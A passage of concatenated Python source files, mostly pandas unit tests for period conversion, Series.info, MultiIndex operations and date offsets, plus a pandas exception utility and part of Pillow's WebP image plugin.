["2011-01-02 00:59:59", "2011-01-03 01:59:59"], name="idx"
)
expected = expected + Timedelta(1, "s") - Timedelta(1, "ns")
tm.assert_index_equal(result, expected)
result = idx.to_timestamp(how="E", freq="H")
expected = DatetimeIndex(["2011-01-02 00:00", "2011-01-03 01:00"], name="idx")
expected = expected + Timedelta(1, "h") - Timedelta(1, "ns")
tm.assert_index_equal(result, expected)
def test_to_timestamp_1703(self):
index = period_range("1/1/2012", periods=4, freq="D")
result = index.to_timestamp()
assert result[0] == Timestamp("1/1/2012")
```
#### File: io/formats/test_series_info.py
```python
from io import StringIO
from string import ascii_uppercase as uppercase
import textwrap
import numpy as np
import pytest
from pandas.compat import PYPY
from pandas import (
CategoricalIndex,
MultiIndex,
Series,
date_range,
)
def test_info_categorical_column_just_works():
n = 2500
data = np.array(list("abcdefghij")).take(np.random.randint(0, 10, size=n))
s = Series(data).astype("category")
s.isna()
buf = StringIO()
s.info(buf=buf)
s2 = s[s == "d"]
buf = StringIO()
s2.info(buf=buf)
def test_info_categorical():
# GH14298
idx = CategoricalIndex(["a", "b"])
s = Series(np.zeros(2), index=idx)
buf = StringIO()
s.info(buf=buf)
@pytest.mark.parametrize("verbose", [True, False])
def test_info_series(lexsorted_two_level_string_multiindex, verbose):
index = lexsorted_two_level_string_multiindex
ser = Series(range(len(index)), index=index, name="sth")
buf = StringIO()
ser.info(verbose=verbose, buf=buf)
result = buf.getvalue()
expected = textwrap.dedent(
"""\
<class 'pandas.core.series.Series'>
MultiIndex: 10 entries, ('foo', 'one') to ('qux', 'three')
"""
)
if verbose:
expected += textwrap.dedent(
"""\
Series name: sth
Non-Null Count Dtype
-------------- -----
10 non-null int64
"""
)
expected += textwrap.dedent(
f"""\
dtypes: int64(1)
memory usage: {ser.memory_usage()}.0+ bytes
"""
)
assert result == expected
def test_info_memory():
s = Series([1, 2], dtype="i8")
buf = StringIO()
s.info(buf=buf)
result = buf.getvalue()
memory_bytes = float(s.memory_usage())
expected = textwrap.dedent(
f"""\
<class 'pandas.core.series.Series'>
RangeIndex: 2 entries, 0 to 1
Series name: None
Non-Null Count Dtype
-------------- -----
2 non-null int64
dtypes: int64(1)
memory usage: {memory_bytes} bytes
"""
)
assert result == expected
def test_info_wide():
s = Series(np.random.randn(101))
msg = "Argument `max_cols` can only be passed in DataFrame.info, not Series.info"
with pytest.raises(ValueError, match=msg):
s.info(max_cols=1)
def test_info_shows_dtypes():
dtypes = [
"int64",
"float64",
"datetime64[ns]",
"timedelta64[ns]",
"complex128",
"object",
"bool",
]
n = 10
for dtype in dtypes:
s = Series(np.random.randint(2, size=n).astype(dtype))
buf = StringIO()
s.info(buf=buf)
res = buf.getvalue()
name = f"{n:d} non-null {dtype}"
assert name in res
@pytest.mark.skipif(PYPY, reason="on PyPy deep=True doesn't change result")
def test_info_memory_usage_deep_not_pypy():
s_with_object_index = Series({"a": [1]}, index=["foo"])
assert s_with_object_index.memory_usage(
index=True, deep=True
) > s_with_object_index.memory_usage(index=True)
s_object = Series({"a": ["a"]})
assert s_object.memory_usage(deep=True) > s_object.memory_usage()
@pytest.mark.skipif(not PYPY, reason="on PyPy deep=True does not change result")
def test_info_memory_usage_deep_pypy():
s_with_object_index = Series({"a": [1]}, index=["foo"])
assert s_with_object_index.memory_usage(
index=True, deep=True
) == s_with_object_index.memory_usage(index=True)
s_object = Series({"a": ["a"]})
assert s_object.memory_usage(deep=True) == s_object.memory_usage()
@pytest.mark.parametrize(
"series, plus",
[
(Series(1, index=[1, 2, 3]), False),
(Series(1, index=list("ABC")), True),
(Series(1, index=MultiIndex.from_product([range(3), range(3)])), False),
(
Series(1, index=MultiIndex.from_product([range(3), ["foo", "bar"]])),
True,
),
],
)
def test_info_memory_usage_qualified(series, plus):
buf = StringIO()
series.info(buf=buf)
if plus:
assert "+" in buf.getvalue()
else:
assert "+" not in buf.getvalue()
def test_info_memory_usage_bug_on_multiindex():
# GH 14308
# memory usage introspection should not materialize .values
N = 100
M = len(uppercase)
index = MultiIndex.from_product(
[list(uppercase), date_range("20160101", periods=N)],
names=["id", "date"],
)
s = Series(np.random.randn(N * M), index=index)
unstacked = s.unstack("id")
assert s.values.nbytes == unstacked.values.nbytes
assert s.memory_usage(deep=True) > unstacked.memory_usage(deep=True).sum()
# high upper bound
diff = unstacked.memory_usage(deep=True).sum() - s.memory_usage(deep=True)
assert diff < 2000
```
#### File: pandas/tests/test_multilevel.py
```python
import numpy as np
import pytest
import pandas as pd
from pandas import (
DataFrame,
MultiIndex,
Series,
)
import pandas._testing as tm
AGG_FUNCTIONS = [
"sum",
"prod",
"min",
"max",
"median",
"mean",
"skew",
"mad",
"std",
"var",
"sem",
]
class TestMultiLevel:
def test_reindex_level(self, multiindex_year_month_day_dataframe_random_data):
# axis=0
ymd = multiindex_year_month_day_dataframe_random_data
with tm.assert_produces_warning(FutureWarning):
month_sums = ymd.sum(level="month")
result = month_sums.reindex(ymd.index, level=1)
expected = ymd.groupby(level="month").transform(np.sum)
tm.assert_frame_equal(result, expected)
# Series
result = month_sums["A"].reindex(ymd.index, level=1)
expected = ymd["A"].groupby(level="month").transform(np.sum)
tm.assert_series_equal(result, expected, check_names=False)
# axis=1
with tm.assert_produces_warning(FutureWarning):
month_sums = ymd.T.sum(axis=1, level="month")
result = month_sums.reindex(columns=ymd.index, level=1)
expected = ymd.groupby(level="month").transform(np.sum).T
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("opname", ["sub", "add", "mul", "div"])
def test_binops_level(
self, opname, multiindex_year_month_day_dataframe_random_data
):
ymd = multiindex_year_month_day_dataframe_random_data
op = getattr(DataFrame, opname)
with tm.assert_produces_warning(FutureWarning):
month_sums = ymd.sum(level="month")
result = op(ymd, month_sums, level="month")
broadcasted = ymd.groupby(level="month").transform(np.sum)
expected = op(ymd, broadcasted)
tm.assert_frame_equal(result, expected)
# Series
op = getattr(Series, opname)
result = op(ymd["A"], month_sums["A"], level="month")
broadcasted = ymd["A"].groupby(level="month").transform(np.sum)
expected = op(ymd["A"], broadcasted)
expected.name = "A"
tm.assert_series_equal(result, expected)
def test_reindex(self, multiindex_dataframe_random_data):
frame = multiindex_dataframe_random_data
expected = frame.iloc[[0, 3]]
reindexed = frame.loc[[("foo", "one"), ("bar", "one")]]
tm.assert_frame_equal(reindexed, expected)
def test_reindex_preserve_levels(
self, multiindex_year_month_day_dataframe_random_data
):
ymd = multiindex_year_month_day_dataframe_random_data
new_index = ymd.index[::10]
chunk = ymd.reindex(new_index)
assert chunk.index is new_index
chunk = ymd.loc[new_index]
assert chunk.index.equals(new_index)
ymdT = ymd.T
chunk = ymdT.reindex(columns=new_index)
assert chunk.columns is new_index
chunk = ymdT.loc[:, new_index]
assert chunk.columns.equals(new_index)
def test_groupby_transform(self, multiindex_dataframe_random_data):
frame = multiindex_dataframe_random_data
s = frame["A"]
grouper = s.index.get_level_values(0)
grouped = s.groupby(grouper)
applied = grouped.apply(lambda x: x * 2)
expected = grouped.transform(lambda x: x * 2)
result = applied.reindex(expected.index)
tm.assert_series_equal(result, expected, check_names=False)
def test_groupby_corner(self):
midx = MultiIndex(
levels=[["foo"], ["bar"], ["baz"]],
codes=[[0], [0], [0]],
names=["one", "two", "three"],
)
df = DataFrame([np.random.rand(4)], columns=["a", "b", "c", "d"], index=midx)
# should work
df.groupby(level="three")
def test_groupby_level_no_obs(self):
# #1697
midx = MultiIndex.from_tuples(
[
("f1", "s1"),
("f1", "s2"),
("f2", "s1"),
("f2", "s2"),
("f3", "s1"),
("f3", "s2"),
]
)
df = DataFrame([[1, 2, 3, 4, 5, 6], [7, 8, 9, 10, 11, 12]], columns=midx)
df1 = df.loc(axis=1)[df.columns.map(lambda u: u[0] in ["f2", "f3"])]
grouped = df1.groupby(axis=1, level=0)
result = grouped.sum()
assert (result.columns == ["f2", "f3"]).all()
def test_setitem_with_expansion_multiindex_columns(
self, multiindex_year_month_day_dataframe_random_data
):
ymd = multiindex_year_month_day_dataframe_random_data
df = ymd[:5].T
df[2000, 1, 10] = df[2000, 1, 7]
assert isinstance(df.columns, MultiIndex)
assert (df[2000, 1, 10] == df[2000, 1, 7]).all()
def test_alignment(self):
x = Series(
data=[1, 2, 3], index=MultiIndex.from_tuples([("A", 1), ("A", 2), ("B", 3)])
)
y = Series(
data=[4, 5, 6], index=MultiIndex.from_tuples([("Z", 1), ("Z", 2), ("B", 3)])
)
res = x - y
exp_index = x.index.union(y.index)
exp = x.reindex(exp_index) - y.reindex(exp_index)
tm.assert_series_equal(res, exp)
# hit non-monotonic code path
res = x[::-1] - y[::-1]
exp_index = x.index.union(y.index)
exp = x.reindex(exp_index) - y.reindex(exp_index)
tm.assert_series_equal(res, exp)
@pytest.mark.parametrize("op", AGG_FUNCTIONS)
@pytest.mark.parametrize("level", [0, 1])
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("sort", [True, False])
def test_series_group_min_max(
self, op, level, skipna, sort, series_with_multilevel_index
):
# GH 17537
ser = series_with_multilevel_index
grouped = ser.groupby(level=level, sort=sort)
# skipna=True
leftside = grouped.agg(lambda x: getattr(x, op)(skipna=skipna))
with tm.assert_produces_warning(FutureWarning):
rightside = getattr(ser, op)(level=level, skipna=skipna)
if sort:
rightside = rightside.sort_index(level=level)
tm.assert_series_equal(leftside, rightside)
@pytest.mark.parametrize("op", AGG_FUNCTIONS)
@pytest.mark.parametrize("level", [0, 1])
@pytest.mark.parametrize("axis", [0, 1])
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("sort", [True, False])
def test_frame_group_ops(
self, op, level, axis, skipna, sort, multiindex_dataframe_random_data
):
# GH 17537
frame = multiindex_dataframe_random_data
frame.iloc[1, [1, 2]] = np.nan
frame.iloc[7, [0, 1]] = np.nan
level_name = frame.index.names[level]
if axis == 0:
frame = frame
else:
frame = frame.T
grouped = frame.groupby(level=level, axis=axis, sort=sort)
pieces = []
def aggf(x):
pieces.append(x)
return getattr(x, op)(skipna=skipna, axis=axis)
leftside = grouped.agg(aggf)
with tm.assert_produces_warning(FutureWarning):
rightside = getattr(frame, op)(level=level, axis=axis, skipna=skipna)
if sort:
rightside = rightside.sort_index(level=level, axis=axis)
frame = frame.sort_index(level=level, axis=axis)
# for good measure, groupby detail
level_index = frame._get_axis(axis).levels[level].rename(level_name)
tm.assert_index_equal(leftside._get_axis(axis), level_index)
tm.assert_index_equal(rightside._get_axis(axis), level_index)
tm.assert_frame_equal(leftside, rightside)
@pytest.mark.parametrize("meth", ["var", "std"])
def test_std_var_pass_ddof(self, meth):
index = MultiIndex.from_arrays(
[np.arange(5).repeat(10), np.tile(np.arange(10), 5)]
)
df = DataFrame(np.random.randn(len(index), 5), index=index)
ddof = 4
alt = lambda x: getattr(x, meth)(ddof=ddof)
with tm.assert_produces_warning(FutureWarning):
result = getattr(df[0], meth)(level=0, ddof=ddof)
expected = df[0].groupby(level=0).agg(alt)
tm.assert_series_equal(result, expected)
with tm.assert_produces_warning(FutureWarning):
result = getattr(df, meth)(level=0, ddof=ddof)
expected = df.groupby(level=0).agg(alt)
tm.assert_frame_equal(result, expected)
def test_agg_multiple_levels(
self, multiindex_year_month_day_dataframe_random_data, frame_or_series
):
ymd = multiindex_year_month_day_dataframe_random_data
ymd = tm.get_obj(ymd, frame_or_series)
with tm.assert_produces_warning(FutureWarning):
result = ymd.sum(level=["year", "month"])
expected = ymd.groupby(level=["year", "month"]).sum()
tm.assert_equal(result, expected)
def test_groupby_multilevel(self, multiindex_year_month_day_dataframe_random_data):
ymd = multiindex_year_month_day_dataframe_random_data
result = ymd.groupby(level=[0, 1]).mean()
k1 = ymd.index.get_level_values(0)
k2 = ymd.index.get_level_values(1)
expected = ymd.groupby([k1, k2]).mean()
# TODO groupby with level_values drops names
tm.assert_frame_equal(result, expected, check_names=False)
assert result.index.names == ymd.index.names[:2]
result2 = ymd.groupby(level=ymd.index.names[:2]).mean()
tm.assert_frame_equal(result, result2)
def test_multilevel_consolidate(self):
index = MultiIndex.from_tuples(
[("foo", "one"), ("foo", "two"), ("bar", "one"), ("bar", "two")]
)
df = DataFrame(np.random.randn(4, 4), index=index, columns=index)
df["Totals", ""] = df.sum(1)
df = df._consolidate()
def test_level_with_tuples(self):
index = MultiIndex(
levels=[[("foo", "bar", 0), ("foo", "baz", 0), ("foo", "qux", 0)], [0, 1]],
codes=[[0, 0, 1, 1, 2, 2], [0, 1, 0, 1, 0, 1]],
)
series = Series(np.random.randn(6), index=index)
frame = DataFrame(np.random.randn(6, 4), index=index)
result = series[("foo", "bar", 0)]
result2 = series.loc[("foo", "bar", 0)]
expected = series[:2]
expected.index = expected.index.droplevel(0)
tm.assert_series_equal(result, expected)
tm.assert_series_equal(result2, expected)
with pytest.raises(KeyError, match=r"^\(\('foo', 'bar', 0\), 2\)$"):
series[("foo", "bar", 0), 2]
result = frame.loc[("foo", "bar", 0)]
result2 = frame.xs(("foo", "bar", 0))
expected = frame[:2]
expected.index = expected.index.droplevel(0)
tm.assert_frame_equal(result, expected)
tm.assert_frame_equal(result2, expected)
index = MultiIndex(
levels=[[("foo", "bar"), ("foo", "baz"), ("foo", "qux")], [0, 1]],
codes=[[0, 0, 1, 1, 2, 2], [0, 1, 0, 1, 0, 1]],
)
series = Series(np.random.randn(6), index=index)
frame = DataFrame(np.random.randn(6, 4), index=index)
result = series[("foo", "bar")]
result2 = series.loc[("foo", "bar")]
expected = series[:2]
expected.index = expected.index.droplevel(0)
tm.assert_series_equal(result, expected)
tm.assert_series_equal(result2, expected)
result = frame.loc[("foo", "bar")]
result2 = frame.xs(("foo", "bar"))
expected = frame[:2]
expected.index = expected.index.droplevel(0)
tm.assert_frame_equal(result, expected)
tm.assert_frame_equal(result2, expected)
def test_reindex_level_partial_selection(self, multiindex_dataframe_random_data):
frame = multiindex_dataframe_random_data
result = frame.reindex(["foo", "qux"], level=0)
expected = frame.iloc[[0, 1, 2, 7, 8, 9]]
tm.assert_frame_equal(result, expected)
result = frame.T.reindex(["foo", "qux"], axis=1, level=0)
tm.assert_frame_equal(result, expected.T)
result = frame.loc[["foo", "qux"]]
tm.assert_frame_equal(result, expected)
result = frame["A"].loc[["foo", "qux"]]
tm.assert_series_equal(result, expected["A"])
result = frame.T.loc[:, ["foo", "qux"]]
tm.assert_frame_equal(result, expected.T)
@pytest.mark.parametrize("d", [4, "d"])
def test_empty_frame_groupby_dtypes_consistency(self, d):
# GH 20888
group_keys = ["<KEY>"]
df = DataFrame({"a": [1], "b": [2], "c": [3], "d": [d]})
g = df[df.a == 2].groupby(group_keys)
result = g.first().index
expected = MultiIndex(
levels=[[1], [2], [3]], codes=[[], [], []], names=["a", "b", "c"]
)
tm.assert_index_equal(result, expected)
def test_duplicate_groupby_issues(self):
idx_tp = [
("600809", "20061231"),
("600809", "20070331"),
("600809", "20070630"),
("600809", "20070331"),
]
dt = ["demo", "demo", "demo", "demo"]
idx = MultiIndex.from_tuples(idx_tp, names=["STK_ID", "RPT_Date"])
s = Series(dt, index=idx)
result = s.groupby(s.index).first()
assert len(result) == 3
def test_subsets_multiindex_dtype(self):
# GH 20757
data = [["x", 1]]
columns = [("a", "b", np.nan), ("a", "c", 0.0)]
df = DataFrame(data, columns=MultiIndex.from_tuples(columns))
expected = df.dtypes.a.b
result = df.a.b.dtypes
tm.assert_series_equal(result, expected)
class TestSorted:
"""everything you wanted to test about sorting"""
def test_sort_non_lexsorted(self):
# degenerate case where we sort but don't
# have a satisfying result :<
# GH 15797
idx = MultiIndex(
[["A", "B", "C"], ["c", "b", "a"]], [[0, 1, 2, 0, 1, 2], [0, 2, 1, 1, 0, 2]]
)
df = DataFrame({"col": range(len(idx))}, index=idx, dtype="int64")
assert df.index.is_monotonic is False
sorted = df.sort_index()
assert sorted.index.is_monotonic is True
expected = DataFrame(
{"col": [1, 4, 5, 2]},
index=MultiIndex.from_tuples(
[("B", "a"), ("B", "c"), ("C", "a"), ("C", "b")]
),
dtype="int64",
)
result = sorted.loc[pd.IndexSlice["B":"C", "a":"c"], :]
tm.assert_frame_equal(result, expected)
```
#### File: tseries/offsets/test_easter.py
```python
from __future__ import annotations
from datetime import datetime
import pytest
from pandas.tests.tseries.offsets.common import (
Base,
assert_offset_equal,
)
from pandas.tseries.offsets import Easter
class TestEaster(Base):
@pytest.mark.parametrize(
"offset,date,expected",
[
(Easter(), datetime(2010, 1, 1), datetime(2010, 4, 4)),
(Easter(), datetime(2010, 4, 5), datetime(2011, 4, 24)),
(Easter(2), datetime(2010, 1, 1), datetime(2011, 4, 24)),
(Easter(), datetime(2010, 4, 4), datetime(2011, 4, 24)),
(Easter(2), datetime(2010, 4, 4), datetime(2012, 4, 8)),
(-Easter(), datetime(2011, 1, 1), datetime(2010, 4, 4)),
(-Easter(), datetime(2010, 4, 5), datetime(2010, 4, 4)),
(-Easter(2), datetime(2011, 1, 1), datetime(2009, 4, 12)),
(-Easter(), datetime(2010, 4, 4), datetime(2009, 4, 12)),
(-Easter(2), datetime(2010, 4, 4), datetime(2008, 3, 23)),
],
)
def test_offset(self, offset, date, expected):
assert_offset_equal(offset, date, expected)
```
#### File: tseries/offsets/test_quarter.py
```python
from datetime import datetime
import pytest
from pandas.tests.tseries.offsets.common import (
Base,
assert_is_on_offset,
assert_offset_equal,
)
from pandas.tseries.offsets import (
QuarterBegin,
QuarterEnd,
)
def test_quarterly_dont_normalize():
date = datetime(2012, 3, 31, 5, 30)
offsets = (QuarterBegin, QuarterEnd)
for klass in offsets:
result = date + klass()
assert result.time() == date.time()
@pytest.mark.parametrize("offset", [QuarterBegin(), QuarterEnd()])
def test_on_offset(offset):
dates = [
datetime(2016, m, d)
for m in [10, 11, 12]
for d in [1, 2, 3, 28, 29, 30, 31]
if not (m == 11 and d == 31)
]
for date in dates:
res = offset.is_on_offset(date)
slow_version = date == (date + offset) - offset
assert res == slow_version
class TestQuarterBegin(Base):
def test_repr(self):
expected = "<QuarterBegin: startingMonth=3>"
assert repr(QuarterBegin()) == expected
expected = "<QuarterBegin: startingMonth=3>"
assert repr(QuarterBegin(startingMonth=3)) == expected
expected = "<QuarterBegin: startingMonth=1>"
assert repr(QuarterBegin(startingMonth=1)) == expected
def test_is_anchored(self):
assert QuarterBegin(startingMonth=1).is_anchored()
assert QuarterBegin().is_anchored()
assert not QuarterBegin(2, startingMonth=1).is_anchored()
def test_offset_corner_case(self):
# corner
offset = QuarterBegin(n=-1, startingMonth=1)
assert datetime(2010, 2, 1) + offset == datetime(2010, 1, 1)
offset_cases = []
offset_cases.append(
(
QuarterBegin(startingMonth=1),
{
datetime(2007, 12, 1): datetime(2008, 1, 1),
datetime(2008, 1, 1): datetime(2008, 4, 1),
datetime(2008, 2, 15): datetime(2008, 4, 1),
datetime(2008, 2, 29): datetime(2008, 4, 1),
datetime(2008, 3, 15): datetime(2008, 4, 1),
datetime(2008, 3, 31): datetime(2008, 4, 1),
datetime(2008, 4, 15): datetime(2008, 7, 1),
datetime(2008, 4, 1): datetime(2008, 7, 1),
},
)
)
offset_cases.append(
(
QuarterBegin(startingMonth=2),
{
datetime(2008, 1, 1): datetime(2008, 2, 1),
datetime(2008, 1, 31): datetime(2008, 2, 1),
datetime(2008, 1, 15): datetime(2008, 2, 1),
datetime(2008, 2, 29): datetime(2008, 5, 1),
datetime(2008, 3, 15): datetime(2008, 5, 1),
datetime(2008, 3, 31): datetime(2008, 5, 1),
datetime(2008, 4, 15): datetime(2008, 5, 1),
datetime(2008, 4, 30): datetime(2008, 5, 1),
},
)
)
offset_cases.append(
(
QuarterBegin(startingMonth=1, n=0),
{
datetime(2008, 1, 1): datetime(2008, 1, 1),
datetime(2008, 12, 1): datetime(2009, 1, 1),
datetime(2008, 1, 1): datetime(2008, 1, 1),
datetime(2008, 2, 15): datetime(2008, 4, 1),
datetime(2008, 2, 29): datetime(2008, 4, 1),
datetime(2008, 3, 15): datetime(2008, 4, 1),
datetime(2008, 3, 31): datetime(2008, 4, 1),
datetime(2008, 4, 15): datetime(2008, 7, 1),
datetime(2008, 4, 30): datetime(2008, 7, 1),
},
)
)
offset_cases.append(
(
QuarterBegin(startingMonth=1, n=-1),
{
datetime(2008, 1, 1): datetime(2007, 10, 1),
datetime(2008, 1, 31): datetime(2008, 1, 1),
datetime(2008, 2, 15): datetime(2008, 1, 1),
datetime(2008, 2, 29): datetime(2008, 1, 1),
datetime(2008, 3, 15): datetime(2008, 1, 1),
datetime(2008, 3, 31): datetime(2008, 1, 1),
datetime(2008, 4, 15): datetime(2008, 4, 1),
datetime(2008, 4, 30): datetime(2008, 4, 1),
datetime(2008, 7, 1): datetime(2008, 4, 1),
},
)
)
offset_cases.append(
(
QuarterBegin(startingMonth=1, n=2),
{
datetime(2008, 1, 1): datetime(2008, 7, 1),
datetime(2008, 2, 15): datetime(2008, 7, 1),
datetime(2008, 2, 29): datetime(2008, 7, 1),
datetime(2008, 3, 15): datetime(2008, 7, 1),
datetime(2008, 3, 31): datetime(2008, 7, 1),
datetime(2008, 4, 15): datetime(2008, 10, 1),
datetime(2008, 4, 1): datetime(2008, 10, 1),
},
)
)
@pytest.mark.parametrize("case", offset_cases)
def test_offset(self, case):
offset, cases = case
for base, expected in cases.items():
assert_offset_equal(offset, base, expected)
class TestQuarterEnd(Base):
_offset = QuarterEnd
def test_repr(self):
expected = "<QuarterEnd: startingMonth=3>"
assert repr(QuarterEnd()) == expected
expected = "<QuarterEnd: startingMonth=3>"
assert repr(QuarterEnd(startingMonth=3)) == expected
expected = "<QuarterEnd: startingMonth=1>"
assert repr(QuarterEnd(startingMonth=1)) == expected
def test_is_anchored(self):
assert QuarterEnd(startingMonth=1).is_anchored()
assert QuarterEnd().is_anchored()
assert not QuarterEnd(2, startingMonth=1).is_anchored()
def test_offset_corner_case(self):
# corner
offset = QuarterEnd(n=-1, startingMonth=1)
assert datetime(2010, 2, 1) + offset == datetime(2010, 1, 31)
offset_cases = []
offset_cases.append(
(
QuarterEnd(startingMonth=1),
{
datetime(2008, 1, 1): datetime(2008, 1, 31),
datetime(2008, 1, 31): datetime(2008, 4, 30),
datetime(2008, 2, 15): datetime(2008, 4, 30),
datetime(2008, 2, 29): datetime(2008, 4, 30),
datetime(2008, 3, 15): datetime(2008, 4, 30),
datetime(2008, 3, 31): datetime(2008, 4, 30),
datetime(2008, 4, 15): datetime(2008, 4, 30),
datetime(2008, 4, 30): datetime(2008, 7, 31),
},
)
)
offset_cases.append(
(
QuarterEnd(startingMonth=2),
{
datetime(2008, 1, 1): datetime(2008, 2, 29),
datetime(2008, 1, 31): datetime(2008, 2, 29),
datetime(2008, 2, 15): datetime(2008, 2, 29),
datetime(2008, 2, 29): datetime(2008, 5, 31),
datetime(2008, 3, 15): datetime(2008, 5, 31),
datetime(2008, 3, 31): datetime(2008, 5, 31),
datetime(2008, 4, 15): datetime(2008, 5, 31),
datetime(2008, 4, 30): datetime(2008, 5, 31),
},
)
)
offset_cases.append(
(
QuarterEnd(startingMonth=1, n=0),
{
datetime(2008, 1, 1): datetime(2008, 1, 31),
datetime(2008, 1, 31): datetime(2008, 1, 31),
datetime(2008, 2, 15): datetime(2008, 4, 30),
datetime(2008, 2, 29): datetime(2008, 4, 30),
datetime(2008, 3, 15): datetime(2008, 4, 30),
datetime(2008, 3, 31): datetime(2008, 4, 30),
datetime(2008, 4, 15): datetime(2008, 4, 30),
datetime(2008, 4, 30): datetime(2008, 4, 30),
},
)
)
offset_cases.append(
(
QuarterEnd(startingMonth=1, n=-1),
{
datetime(2008, 1, 1): datetime(2007, 10, 31),
datetime(2008, 1, 31): datetime(2007, 10, 31),
datetime(2008, 2, 15): datetime(2008, 1, 31),
datetime(2008, 2, 29): datetime(2008, 1, 31),
datetime(2008, 3, 15): datetime(2008, 1, 31),
datetime(2008, 3, 31): datetime(2008, 1, 31),
datetime(2008, 4, 15): datetime(2008, 1, 31),
datetime(2008, 4, 30): datetime(2008, 1, 31),
datetime(2008, 7, 1): datetime(2008, 4, 30),
},
)
)
offset_cases.append(
(
QuarterEnd(startingMonth=1, n=2),
{
datetime(2008, 1, 31): datetime(2008, 7, 31),
datetime(2008, 2, 15): datetime(2008, 7, 31),
datetime(2008, 2, 29): datetime(2008, 7, 31),
datetime(2008, 3, 15): datetime(2008, 7, 31),
datetime(2008, 3, 31): datetime(2008, 7, 31),
datetime(2008, 4, 15): datetime(2008, 7, 31),
datetime(2008, 4, 30): datetime(2008, 10, 31),
},
)
)
@pytest.mark.parametrize("case", offset_cases)
def test_offset(self, case):
offset, cases = case
for base, expected in cases.items():
assert_offset_equal(offset, base, expected)
on_offset_cases = [
(QuarterEnd(1, startingMonth=1), datetime(2008, 1, 31), True),
(QuarterEnd(1, startingMonth=1), datetime(2007, 12, 31), False),
(QuarterEnd(1, startingMonth=1), datetime(2008, 2, 29), False),
(QuarterEnd(1, startingMonth=1), datetime(2007, 3, 30), False),
(QuarterEnd(1, startingMonth=1), datetime(2007, 3, 31), False),
(QuarterEnd(1, startingMonth=1), datetime(2008, 4, 30), True),
(QuarterEnd(1, startingMonth=1), datetime(2008, 5, 30), False),
(QuarterEnd(1, startingMonth=1), datetime(2008, 5, 31), False),
(QuarterEnd(1, startingMonth=1), datetime(2007, 6, 29), False),
(QuarterEnd(1, startingMonth=1), datetime(2007, 6, 30), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 1, 31), False),
(QuarterEnd(1, startingMonth=2), datetime(2007, 12, 31), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 2, 29), True),
(QuarterEnd(1, startingMonth=2), datetime(2007, 3, 30), False),
(QuarterEnd(1, startingMonth=2), datetime(2007, 3, 31), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 4, 30), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 5, 30), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 5, 31), True),
(QuarterEnd(1, startingMonth=2), datetime(2007, 6, 29), False),
(QuarterEnd(1, startingMonth=2), datetime(2007, 6, 30), False),
(QuarterEnd(1, startingMonth=3), datetime(2008, 1, 31), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 12, 31), True),
(QuarterEnd(1, startingMonth=3), datetime(2008, 2, 29), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 3, 30), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 3, 31), True),
(QuarterEnd(1, startingMonth=3), datetime(2008, 4, 30), False),
(QuarterEnd(1, startingMonth=3), datetime(2008, 5, 30), False),
(QuarterEnd(1, startingMonth=3), datetime(2008, 5, 31), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 6, 29), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 6, 30), True),
]
@pytest.mark.parametrize("case", on_offset_cases)
def test_is_on_offset(self, case):
offset, dt, expected = case
assert_is_on_offset(offset, dt, expected)
```
#### File: pandas/util/_exceptions.py
```python
from __future__ import annotations
import contextlib
import inspect
import os
@contextlib.contextmanager
def rewrite_exception(old_name: str, new_name: str):
"""
Rewrite the message of an exception.
"""
try:
yield
except Exception as err:
if not err.args:
raise
msg = str(err.args[0])
msg = msg.replace(old_name, new_name)
args: tuple[str, ...] = (msg,)
if len(err.args) > 1:
args = args + err.args[1:]
err.args = args
raise
def find_stack_level() -> int:
"""
Find the first place in the stack that is not inside pandas
(tests notwithstanding).
"""
stack = inspect.stack()
import pandas as pd
pkg_dir = os.path.dirname(pd.__file__)
test_dir = os.path.join(pkg_dir, "tests")
for n in range(len(stack)):
fname = stack[n].filename
if fname.startswith(pkg_dir) and not fname.startswith(test_dir):
continue
else:
break
return n
```
#### File: site-packages/PIL/WebPImagePlugin.py
```python
from io import BytesIO
from . import Image, ImageFile
try:
from . import _webp
SUPPORTED = True
except ImportError:
SUPPORTED = False
_VALID_WEBP_MODES = {"RGBX": True, "RGBA": True, "RGB": True}
_VALID_WEBP_LEGACY_MODES = {"RGB": True, "RGBA": True}
_VP8_MODES_BY_IDENTIFIER = {
b"VP8 ": "RGB",
b"VP8X": "RGBA",
b"VP8L": "RGBA", # lossless
}
def _accept(prefix):
is_riff_file_format = prefix[:4] == b"RIFF"
is_webp_file = prefix[8:12] == b"WEBP"
is_valid_vp8_mode = prefix[12:16] in _VP8_MODES_BY_IDENTIFIER
if is_riff_file_format and is_webp_file and is_valid_vp8_mode:
if not SUPPORTED:
return (
"image file could not be identified because WEBP support not installed"
)
return True
class WebPImageFile(ImageFile.ImageFile):
format = "WEBP"
format_description = "WebP image"
__loaded = 0
__logical_frame = 0
def _open(self):
if not _webp.HAVE_WEBPANIM:
# Legacy mode
data, width, height, self.mode, icc_profile, exif = _webp.WebPDecode(
self.fp.read()
)
if icc_profile:
self.info["icc_profile"] = icc_profile
if exif:
self.info["exif"] = exif
self._size = width, height
self.fp = BytesIO(data)
self.tile = [("raw", (0, 0) + self.size, 0, self.mode)]
self.n_frames = 1
self.is_animated = False
return
# Use the newer AnimDecoder API to parse the (possibly) animated file,
# and access muxed chunks like ICC/EXIF/XMP.
self._decoder = _webp.WebPAnimDecoder(self.fp.read())
# Get info from decoder
width, height, loop_count, bgcolor, frame_count, mode = self._decoder.get_info()
self._size = width, height
self.info["loop"] = loop_count
bg_a, bg_r, bg_g, bg_b = (
(bgcolor >> 24) & 0xFF,
(bgcolor >> 16) & 0xFF,
(bgcolor >> 8) & 0xFF,
bgcolor & 0xFF,
)
self.info["background"] = (bg_r, bg_g, bg_b, bg_a)
self.n_frames = frame_count
self.is_animated = self.n_frames > 1
self.mode = "RGB" if mode == "RGBX" else mode
self.rawmode = mode
self.tile = []
# Attempt to read ICC / EXIF / XMP chunks from file
icc_profile = self._decoder.get_chunk("ICCP")
exif = self._decoder.get_chunk("EXIF")
